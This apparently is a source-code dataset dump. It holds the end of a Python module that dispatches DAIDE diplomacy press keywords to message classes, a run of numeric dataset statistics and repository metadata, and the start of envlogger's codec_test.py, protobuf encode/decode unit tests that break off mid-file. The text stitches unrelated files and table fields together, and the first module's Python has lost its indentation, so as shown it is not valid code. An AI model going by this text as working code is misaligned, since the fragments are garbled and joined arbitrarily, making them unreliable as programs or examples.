if daidelists[0] == 'FCT':
return PressFact(utterance, container, daidelists)
elif daidelists[0] == 'PRP':
return PressProposal(utterance, container, daidelists)
elif daidelists[0] == 'YES':
return PressAccept(utterance, container, daidelists)
elif daidelists[0] == 'REJ':
return PressReject(utterance, container, daidelists)
elif daidelists[0] == 'CCL':
return PressCancel(utterance, container, daidelists)
elif daidelists[0] == 'HUH':
return PressHuh(utterance, container, daidelists)
elif daidelists[0] == 'BWX':
return PressIgnore(utterance, container, daidelists)
elif daidelists[0] == 'PCE':
return PressPeace(utterance, container, daidelists)
elif daidelists[0] == 'ALY':
return PressAlliance(utterance, container, daidelists)
elif daidelists[0] == 'DMZ':
return PressDMZ(utterance, container, daidelists)
elif daidelists[0] == 'DRW':
return PressDraw(utterance, container, daidelists)
elif daidelists[0] == 'SLO':
return PressSolo(utterance, container, daidelists)
elif daidelists[0] == 'ORR':
return PressOr(utterance, container, daidelists)
elif daidelists[0] == 'AND':
return PressAnd(utterance, container, daidelists)
elif daidelists[0] == 'IFF':
return PressIf(utterance, container, daidelists)
elif daidelists[0] == 'NOT':
return PressNot(utterance, container, daidelists)
elif daidelists[0] == 'NAR':
return PressNar(utterance, container, daidelists)
elif daidelists[0] == 'XDO':
return PressMoveExecute(utterance, container, daidelists)
elif len(daidelists) == 2 and daidelists[1] == 'HLD':
return PressHold(utterance, container, daidelists)
elif len(daidelists) == 3 and daidelists[1] == 'MTO':
return PressMoveInto(utterance, container, daidelists)
elif len(daidelists) == 3 and daidelists[1] == 'SUP':
return PressSupportHold(utterance, container, daidelists)
elif len(daidelists) == 5 and daidelists[1] == 'SUP' and daidelists[3] == 'MTO':
return PressSupportMove(utterance, container, daidelists)
elif len(daidelists) == 5 and daidelists[1] == 'CVY' and daidelists[3] == 'CTO':
return PressConvoy(utterance, container, daidelists)
elif len(daidelists) == 5 and daidelists[1] == 'CVY' and daidelists[3] == 'VIA':
return PressConvoyVia(utterance, container, daidelists)
elif len(daidelists) == 3 and daidelists[1] == 'RTO':
return PressRetreat(utterance, container, daidelists)
elif len(daidelists) == 2 and daidelists[1] == 'DSB':
return PressDisband(utterance, container, daidelists)
elif len(daidelists) == 2 and daidelists[1] == 'BLD':
return PressBuild(utterance, container, daidelists)
elif len(daidelists) == 2 and daidelists[1] == 'REM':
return PressRemove(utterance, container, daidelists)
elif len(daidelists) == 2 and daidelists[1] == 'WVE':
return PressWaive(utterance, container, daidelists)
else:
return PressMessage(utterance, container)
def randomFactory(utterance, container, daideword): # type: (PressUtterance, PressMessage, str) -> PressMessage
"""
Randomly constructs the objects and subobjects corresponding to a DAIDE word
:param utterance: the original DAIDE utterance
:type utterance: PressUtterance
:param container: the DAIDE message that contains this one
:type container: PressMessage
:param daideword: the DAIDE keyword for this message (PRP, FCT, etc.)
:type daideword: str
:return: a randomly constructed DAIDE message
:rtype: PressMessage
"""
if daideword == 'FCT':
return PressFact(utterance, container, None)
elif daideword == 'PRP':
return PressProposal(utterance, container, None)
elif daideword == 'YES':
return PressAccept(utterance, container, None)
elif daideword == 'REJ':
return PressReject(utterance, container, None)
elif daideword == 'CCL':
return PressCancel(utterance, container, None)
elif daideword == 'HUH':
return PressHuh(utterance, container, None)
elif daideword == 'BWX':
return PressIgnore(utterance, container, None)
elif daideword == 'PCE':
return PressPeace(utterance, container, None)
elif daideword == 'ALY':
return PressAlliance(utterance, container, None)
elif daideword == 'DMZ':
return PressDMZ(utterance, container, None)
elif daideword == 'DRW':
return PressDraw(utterance, container, None)
elif daideword == 'SLO':
return PressSolo(utterance, container, None)
elif daideword == 'ORR':
return PressOr(utterance, container, None)
elif daideword == 'AND':
return PressAnd(utterance, container, None)
elif daideword == 'IFF':
return PressIf(utterance, container, None)
elif daideword == 'NOT':
return PressNot(utterance, container, None)
elif daideword == 'NAR':
return PressNar(utterance, container, None)
elif daideword == 'XDO':
return PressMoveExecute(utterance, container, None)
elif daideword == 'HLD':
return PressHold(utterance, container, None)
elif daideword == 'MTO':
return PressMoveInto(utterance, container, None)
elif daideword == 'SUP':
return PressSupportHold(utterance, container, None)
elif daideword == 'SUPMTO':
return PressSupportMove(utterance, container, None)
elif daideword == 'CVYCTO':
return PressConvoy(utterance, container, None)
elif daideword == 'CVYVIA':
return PressConvoyVia(utterance, container, None)
elif daideword == 'RTO':
return PressRetreat(utterance, container, None)
elif daideword == 'DSB':
return PressDisband(utterance, container, None)
elif daideword == 'BLD':
return PressBuild(utterance, container, None)
elif daideword == 'REM':
return PressRemove(utterance, container, None)
elif daideword == 'WVE':
return PressWaive(utterance, container, None)
else:
return PressMessage(utterance, container)
def daide2gloss(daide, tones=None): # type: (str, []) -> str
"""
Create a new utterance from DAIDE, return an English gloss
:param daide: the press utterance in DAIDE syntax
:type daide: str
:param tones: the tones to use when forming English
:type tones: []
"""
if daide is None or len(daide.strip()) < 3:
return 'Ahem.'
utterance = PressUtterance(daide, tones)
utterance.formenglish()
return utterance.english
| 45.440378
| 219
| 0.623051
| 16,750
| 148,999
| 5.526567
| 0.030925
| 0.051075
| 0.053711
| 0.042973
| 0.927774
| 0.895268
| 0.871513
| 0.84347
| 0.834784
| 0.817511
| 0
| 0.002436
| 0.247874
| 148,999
| 3,278
| 220
| 45.45424
| 0.823595
| 0.214451
| 0
| 0.698513
| 0
| 0.02746
| 0.176175
| 0
| 0.000572
| 0
| 0
| 0
| 0
| 1
| 0.074371
| false
| 0
| 0.001716
| 0
| 0.188215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed870adf1760ddaf6696e4c422cf0627e4165570
| 65,403
|
py
|
Python
|
envlogger/converters/codec_test.py
|
deepmind/envlogger
|
bbe20d7b621ffc76091219c52750f95acfa18157
|
[
"Apache-2.0"
] | 34
|
2021-08-23T14:10:08.000Z
|
2022-03-25T03:26:52.000Z
|
envlogger/converters/codec_test.py
|
deepmind/envlogger
|
bbe20d7b621ffc76091219c52750f95acfa18157
|
[
"Apache-2.0"
] | 3
|
2021-12-07T17:09:04.000Z
|
2022-03-31T17:10:02.000Z
|
envlogger/converters/codec_test.py
|
deepmind/envlogger
|
bbe20d7b621ffc76091219c52750f95acfa18157
|
[
"Apache-2.0"
] | 2
|
2021-10-05T16:06:19.000Z
|
2021-11-06T21:40:43.000Z
|
# coding=utf-8
# Copyright 2022 DeepMind Technologies Limited..
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for codec."""
from absl.testing import absltest
from absl.testing import parameterized
from envlogger.converters import codec
from envlogger.proto import storage_pb2
import numpy as np
class NumpyConvertersTest(parameterized.TestCase):
##############################################################################
#
# Datum tests (i.e. not Array/Tuple/Dict of Datums)
#
##############################################################################
##############################################################################
#
# Scalar tests
#
##############################################################################
##############################################################################
# Empty and None values
##############################################################################
def test_encode_none(self):
"""The proto should be completely empty if given a None value."""
self.assertEqual(codec.encode(None), storage_pb2.Data())
def test_decode_none(self):
"""Decoding a None value should produce None."""
self.assertIsNone(codec.decode(None))
def test_decode_empty_proto(self):
"""Decoding an empty proto should produce None."""
user_data = storage_pb2.Data()
self.assertIsNone(codec.decode(user_data))
def test_encode_empty_ndarray(self):
"""The proto should be completely empty if given zero shape numpy array."""
self.assertEqual(codec.encode(np.array([])), storage_pb2.Data())
# Also test other explicit types.
self.assertEqual(
codec.encode(np.array([], dtype='float')), storage_pb2.Data())
def test_identity_none(self):
"""Encoding and decoding it back should not change its value."""
self.assertIsNone(codec.decode(codec.encode(None)))
##############################################################################
# float32
##############################################################################
def test_encode_32bit_float_scalar(self):
"""Proto supports float32 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.float_values.append(np.float32(3.14))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.float32(3.14)), expected)
def test_decode_32bit_float_scalar(self):
"""Proto supports float32 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.float_values.append(np.float32(3.14))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.float32)
self.assertEqual(decoded, np.float32(3.14))
def test_identity_32bit_float_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.float32(3.14)))
self.assertIsInstance(decoded, np.float32)
self.assertEqual(decoded, np.float32(3.14))
##############################################################################
# float32 buffer
##############################################################################
def test_decode_32bit_float_scalar_buffer(self):
"""Proto supports float32 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
# 3.14159 in big-endian byte array.
datum.values.float_values_buffer = b'\x40\x49\x0f\xd0'
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.float32)
self.assertEqual(decoded, np.float32(3.14159))
##############################################################################
# float64 (aka double)
##############################################################################
def test_encode_double_scalar(self):
"""Proto supports double so we expect no precision loss in encoding."""
# Ordinary floats in python are 64-bit floats.
expected = storage_pb2.Data()
datum = expected.datum
datum.values.double_values.append(3.14159265358979)
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(3.14159265358979), expected)
# np.float64 should also work.
self.assertEqual(codec.encode(np.float64(3.14159265358979)), expected)
def test_decode_double_scalar(self):
"""Proto supports double so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.double_values.append(3.14159265358979)
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.float64)
self.assertEqual(decoded, np.float64(3.14159265358979))
def test_identity_double_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.float64(3.14159265358979)))
self.assertIsInstance(decoded, np.float64)
self.assertEqual(decoded, np.float64(3.14159265358979))
##############################################################################
# int32
##############################################################################
def test_encode_int32_scalar(self):
"""Proto supports int32 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int32_values.append(np.int32(3))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.int32(3)), expected)
def test_decode_int32_scalar(self):
"""Proto supports int32 so we expect no precision loss in encoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.int32_values.append(np.int32(-32))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.int32)
self.assertEqual(decoded, np.int32(-32))
def test_identity_int32_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int32(-3)))
self.assertIsInstance(decoded, np.int32)
self.assertEqual(decoded, np.int32(-3))
##############################################################################
# int64
##############################################################################
def test_encode_int64_scalar(self):
"""Proto supports int64 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int64_values.append(np.int64(-3))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.int64(-3)), expected)
def test_decode_int64_scalar(self):
"""Proto supports int64 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.int64_values.append(np.int64(-64))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.int64)
self.assertEqual(decoded, np.int64(-64))
def test_identity_int64_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int64(-1234567890123)))
self.assertIsInstance(decoded, np.int64)
self.assertEqual(decoded, np.int64(-1234567890123))
##############################################################################
# uint32
##############################################################################
def test_encode_uint32_scalar(self):
"""Proto supports uint32 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint32_values.append(np.uint32(12345))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.uint32(12345)), expected)
def test_decode_uint32_scalar(self):
"""Proto supports uint32 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.uint32_values.append(np.uint32(32))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.uint32)
self.assertEqual(decoded, np.uint32(32))
def test_identity_uint32_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.uint32(4294967295)))
self.assertIsInstance(decoded, np.uint32)
self.assertEqual(decoded, np.uint32(4294967295))
##############################################################################
# uint64
##############################################################################
def test_encode_uint64_scalar(self):
"""Proto supports uint64 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint64_values.append(np.uint64(12345))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.uint64(12345)), expected)
def test_decode_uint64_scalar(self):
"""Proto supports uint64 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.uint64_values.append(np.uint64(64))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.uint64)
self.assertEqual(decoded, np.uint64(64))
def test_identity_uint64_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.uint64(18446744073709551615)))
self.assertIsInstance(decoded, np.uint64)
self.assertEqual(decoded, np.uint64(18446744073709551615))
##############################################################################
# bool
##############################################################################
def test_encode_bool_scalar(self):
"""Proto supports bool so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bool_values.append(True)
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(True), expected)
# Numpy's booleans should also work.
self.assertEqual(codec.encode(np.bool(True)), expected)
self.assertEqual(codec.encode(np.bool_(True)), expected)
def test_decode_bool_scalar(self):
"""Proto supports bool so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.bool_values.append(True)
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertEqual(decoded, True)
def test_identity_bool_scalar_true(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(True))
self.assertIsInstance(decoded, bool)
self.assertEqual(decoded, True)
# Numpy's booleans should also work, but they all become Python bools.
decoded = codec.decode(codec.encode(np.bool_(True)))
self.assertIsInstance(decoded, bool)
self.assertEqual(decoded, True)
decoded = codec.decode(codec.encode(np.bool(True)))
self.assertIsInstance(decoded, bool)
self.assertEqual(decoded, True)
def test_identity_bool_scalar_false(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(False))
self.assertIsInstance(decoded, bool)
self.assertEqual(decoded, False)
##############################################################################
# string
##############################################################################
def test_encode_string_scalar(self):
"""Proto supports string so we expect no loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.string_values.append('pi')
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode('pi'), expected)
def test_decode_string_scalar(self):
"""Proto supports string so we expect no loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.string_values.append('ravel')
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, str)
self.assertEqual(decoded, 'ravel')
def test_identity_string_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode('do not change me, please!'))
self.assertIsInstance(decoded, str)
self.assertEqual(decoded, 'do not change me, please!')
##############################################################################
# bytes
##############################################################################
def test_encode_bytes_scalar(self):
"""Proto supports bytes so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bytes_values.append(b'pi')
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(b'pi'), expected)
def test_decode_bytes_scalar(self):
"""Proto supports bytes so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.bytes_values.append(b'xu xin')
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, bytes)
self.assertEqual(decoded, b'xu xin')
def test_identity_bytes_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(b'awesome bytes'))
self.assertIsInstance(decoded, bytes)
self.assertEqual(decoded, b'awesome bytes')
##############################################################################
# big int (arbitrarily long)
##############################################################################
def test_encode_int_small_scalar(self):
"""Ensures that a vanilla Python int can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bigint_values.append(b'\x03')
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(3), expected)
def test_encode_bigint_scalar(self):
"""Ensures that a large Python int can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bigint_values.append(
b'\x01\x8e\xe9\x0f\xf6\xc3s\xe0\xeeN?\n\xd2')
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(123456789012345678901234567890), expected)
def test_encode_negative_bigint_scalar(self):
"""Ensures that a large negative Python int can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bigint_values.append(
b'\xfeq\x16\xf0\t<\x8c\x1f\x11\xb1\xc0\xf5.')
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(-123456789012345678901234567890), expected)
def test_decode_int_scalar(self):
"""Ensures that a large negative integer can be decoded to a Python int."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.bigint_values.append(
b'\xfeq\x16\xf0\t<\x8c\x1f\x11\xb1\xc0\xf5.')
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, int)
self.assertEqual(decoded, -123456789012345678901234567890)
def test_identity_int_scalar_positive(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(12345678901234567890))
self.assertIsInstance(decoded, int)
self.assertEqual(decoded, 12345678901234567890)
def test_identity_int_scalar_zero(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(0))
self.assertIsInstance(decoded, int)
self.assertEqual(decoded, 0)
def test_identity_int_scalar_negative(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(-98765432109876543210))
self.assertIsInstance(decoded, int)
self.assertEqual(decoded, -98765432109876543210)
##############################################################################
# int8
##############################################################################
def test_encode_int8_scalar(self):
"""Ensures that an np.int8 can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int8_values = b'\x03'
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.int8(3)), expected)
def test_decode_int8_scalar(self):
"""Ensures that int8s can be retrieved as np.int8."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.int8_values = b'\xfd'
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.int8)
self.assertEqual(decoded, np.int8(-3))
def test_identity_int8_scalar_negative(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int8(-123)))
self.assertIsInstance(decoded, np.int8)
self.assertEqual(decoded, np.int8(-123))
def test_identity_int8_scalar_zero(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int8(0)))
self.assertIsInstance(decoded, np.int8)
self.assertEqual(decoded, np.int8(0))
def test_identity_int8_scalar_positive(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int8(127)))
self.assertIsInstance(decoded, np.int8)
self.assertEqual(decoded, np.int8(127))
##############################################################################
# int16
##############################################################################
def test_encode_int16_scalar(self):
"""Ensures that an np.int16 can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int16_values = b'\xfe\xd4'
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.int16(-300)), expected)
def test_decode_int16_scalar(self):
"""Ensures that int16s can be retrieved as np.int16."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.int16_values = b'\x07\xd0'
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.int16)
self.assertEqual(decoded, np.int16(2000))
def test_identity_int16_scalar_negative(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int16(-123)))
self.assertIsInstance(decoded, np.int16)
self.assertEqual(decoded, np.int16(-123))
def test_identity_int16_scalar_zero(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int16(0)))
self.assertIsInstance(decoded, np.int16)
self.assertEqual(decoded, np.int16(0))
def test_identity_int16_scalar_positive(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int16(127)))
self.assertIsInstance(decoded, np.int16)
self.assertEqual(decoded, np.int16(127))
##############################################################################
# uint8
##############################################################################
def test_encode_uint8_scalar(self):
"""Ensures that an np.uint8 can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint8_values = b'\xfb'
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.uint8(251)), expected)
def test_decode_uint8_scalar(self):
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.uint8_values = b'\xed'
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.uint8)
self.assertEqual(decoded, np.uint8(237))
def test_identity_uint8_scalar_zero(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.uint8(0)))
self.assertIsInstance(decoded, np.uint8)
self.assertEqual(decoded, np.uint8(0))
def test_identity_uint8_scalar_positive(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.uint8(255)))
self.assertIsInstance(decoded, np.uint8)
self.assertEqual(decoded, np.uint8(255))
##############################################################################
# uint16
##############################################################################
def test_encode_uint16_scalar(self):
"""Ensures that an np.uint16 can be stored as bytes."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint16_values = b'\x03\xe8'
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.uint16(1000)), expected)
def test_decode_uint16_scalar(self):
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.uint16_values = b'\x0b\xb8'
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.uint16)
self.assertEqual(decoded, np.uint16(3000))
def test_identity_uint16_scalar_zero(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.uint16(0)))
self.assertIsInstance(decoded, np.uint16)
self.assertEqual(decoded, np.uint16(0))
def test_identity_uint16_scalar_positive(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.uint16(12345)))
self.assertIsInstance(decoded, np.uint16)
self.assertEqual(decoded, np.uint16(12345))
##############################################################################
#
# Array tests
#
##############################################################################
##############################################################################
# Empty and None values
##############################################################################
def test_encode_empty_list(self):
"""Tests that a Python list of one None element is represented by an Array."""
expected = storage_pb2.Data()
self.assertEqual(codec.encode([]), expected)
def test_encode_none_list(self):
"""Tests that a Python list of one None element is represented by an Array."""
expected = storage_pb2.Data()
expected.array.values.add()
self.assertEqual(codec.encode([None]), expected)
def test_encode_two_none_list(self):
"""Tests that a Python list of one None element is represented by an Array."""
expected = storage_pb2.Data()
expected.array.values.add()
expected.array.values.add()
self.assertEqual(codec.encode([None, None]), expected)
def test_encode_decode_empty_list(self):
"""Tests that an empty Python list becomes None when decoded."""
self.assertIsNone(codec.decode(codec.encode([])), None)
##############################################################################
# float32
##############################################################################
def test_encode_float32_list(self):
"""Tests that a Python list of one element is represented by an Array."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.values.float_values.append(np.float32(3.14))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode([np.float32(3.14)]), expected)
def test_decode_float32_list(self):
"""Tests that we get a Python list from a proto Array."""
user_data = storage_pb2.Data()
datum = user_data.array.values.add().datum
datum.values.float_values.append(np.float32(3.14))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertNotEmpty(decoded)
self.assertIsInstance(decoded[0], np.float32)
self.assertListEqual(decoded, [np.float32(3.14)])
def test_encode_float32_nested_list(self):
"""Ensures that [[1.2, 3.4], [5.6, 7.8]] is represented correctly."""
expected = storage_pb2.Data()
array1 = expected.array.values.add().array
datum1 = array1.values.add().datum
datum1.values.float_values.append(np.float32(1.2))
datum1.shape.dim.add().size = -438
datum2 = array1.values.add().datum
datum2.values.float_values.append(np.float32(3.4))
datum2.shape.dim.add().size = -438
array2 = expected.array.values.add().array
datum3 = array2.values.add().datum
datum3.values.float_values.append(np.float32(5.6))
datum3.shape.dim.add().size = -438
datum4 = array2.values.add().datum
datum4.values.float_values.append(np.float32(7.8))
datum4.shape.dim.add().size = -438
self.assertEqual(
codec.encode([[np.float32(1.2), np.float32(3.4)],
[np.float32(5.6), np.float32(7.8)]]), expected)
##############################################################################
# float64
##############################################################################
def test_encode_float64_list(self):
"""Tests that a Python list of one element is represented by an Array."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.values.double_values.append(np.float64(6.28))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode([np.float64(6.28)]), expected)
def test_decode_float64_list(self):
"""Tests that we get a Python list from a proto Array."""
user_data = storage_pb2.Data()
datum = user_data.array.values.add().datum
datum.values.double_values.append(np.float64(6.28))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertNotEmpty(decoded)
self.assertIsInstance(decoded[0], np.float64)
self.assertListEqual(decoded, [np.float64(6.28)])
##############################################################################
# int32
##############################################################################
def test_encode_int32_list(self):
"""Tests that a Python list of one element is represented by an Array."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.values.int32_values.append(np.int32(-12345))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode([np.int32(-12345)]), expected)
def test_decode_int32_list(self):
"""Tests that a Python list of one element is represented by an Array."""
user_data = storage_pb2.Data()
datum = user_data.array.values.add().datum
datum.values.int32_values.append(np.int32(-12345))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertNotEmpty(decoded)
self.assertIsInstance(decoded[0], np.int32)
self.assertListEqual(decoded, [np.int32(-12345)])
##############################################################################
# int64
##############################################################################
def test_encode_int64_list(self):
"""Tests that a Python list of one element is represented by an Array."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.values.int64_values.append(np.int64(-1234567890123456))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode([np.int64(-1234567890123456)]), expected)
def test_decode_int64_list(self):
"""Tests that a Python list of one element is represented by an Array."""
user_data = storage_pb2.Data()
datum = user_data.array.values.add().datum
datum.values.int64_values.append(np.int64(-1234567890123456))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertNotEmpty(decoded)
self.assertIsInstance(decoded[0], np.int64)
self.assertListEqual(decoded, [np.int64(-1234567890123456)])
# Homogeneity.
def test_encode_heterogeneous_list(self):
"""Tests that an error is thrown for a list with different types."""
user_data = [np.int64(-1234567890123456), np.int32(1)]
self.assertRaises(TypeError, codec.encode, user_data)
##############################################################################
#
